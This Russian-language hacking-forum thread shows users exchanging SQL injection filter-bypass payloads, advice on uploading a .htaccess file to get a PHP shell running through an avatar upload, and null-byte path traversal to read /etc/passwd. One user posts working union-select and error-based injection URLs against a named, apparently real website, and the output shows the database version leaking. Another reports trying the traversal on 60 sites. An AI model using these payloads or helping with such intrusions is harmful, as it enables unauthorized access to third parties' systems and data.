 |
|
22.03.2021, 13:38
|
|
Новичок
Регистрация: 19.07.2020
Сообщений: 6
С нами:
3063926
Репутация:
1
|
|
Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:
Код:
products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.
Всем заранее спасибо! |
|
|
24.03.2021, 15:14
|
|
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
С нами:
3943766
Репутация:
47
|
|
Сообщение от Samozvanec
↑
Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:
Код:
products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.
Всем заранее спасибо!
В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос
Код:
id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.
В конце концов выйдет так:
Код:
24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#
Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..
|
|
|
|
24.03.2021, 18:09
|
|
Новичок
Регистрация: 19.07.2020
Сообщений: 6
С нами:
3063926
Репутация:
1
|
|
Сообщение от fandor9
↑
В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос
Код:
id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.
В конце концов выйдет так:
Код:
24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#
Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..
Надо же, как всё тривиально! И как же я сам до этого не додумался! Спасибо огромное за ответ!
|
|
|
|
27.03.2021, 09:41
|
|
Познающий
Регистрация: 08.06.2015
Сообщений: 50
С нами:
5753846
Репутация:
11
|
|
Доброго времени суток. Столкнулся с проблемой при загрузке шелла.
На сайте есть функция загрузки аватарки, в запросе можно подменить расширение файла на какое угодно. Файл успешно грузится на сервак, но при переходе по ссылке он открывается как пикча (как ссылка внутри тега img), какое бы расширение я не выбрал. В ответе сервер возвращает content type image/jpeg (или тот, биты которого я подставляю в пэйлоад). Подмена mime type в реквесте на отличное от gif/png/jpeg не дает залить файл.
Как можно запустить код эксплойта?
Сервер: nginx
|
|
|
|
27.03.2021, 13:30
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Попробуй залить .htaccess с разрешение на пхп
|
|
|
|
30.03.2021, 15:21
|
|
Новичок
Регистрация: 19.07.2020
Сообщений: 6
С нами:
3063926
Репутация:
1
|
|
Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT
Код:
www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6,7--+-
PS
waf обошел,
Код:
http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-
но не могу спровоцировать вывод уязвимых полей |
|
|
|
02.04.2021, 00:32
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами:
6747446
Репутация:
32
|
|
Всем привет!
Код:
$page = isset($_GET['lang']) ? $_GET['lang'] : 'default';
if (! is_file('./language/'.$page.'/language.php')) {
$page = 'default';
}
require_once './language/default/language.php';
if ('default' != $page) {
include_once './language/'.$page.'/language.php';
}
Php version 5.3.6
Есть вариант в этой версии отсечь префикс или иной вариант раскрутки? |
|
|
|
02.04.2021, 07:35
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от WallHack
↑
Всем привет!
Php version
5.3.6
Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?
Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00
|
|
|
|
02.04.2021, 10:48
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами:
5713526
Репутация:
145
|
|
Сообщение от Samozvanec
↑
Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT
Код:
www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6,7--+-
PS
waf обошел,
Код:
http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-
но не могу спровоцировать вывод уязвимых полей
Error-Based например:
Код:
http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-
Код:
XPATH syntax error: ':5.5.65-MariaDB'
Agent Code Is Invalid
|
|
|
|
02.04.2021, 11:21
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами:
6747446
Репутация:
32
|
|
Сообщение от winstrool
↑
Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00
Спасибо за ответ!
Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало
Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
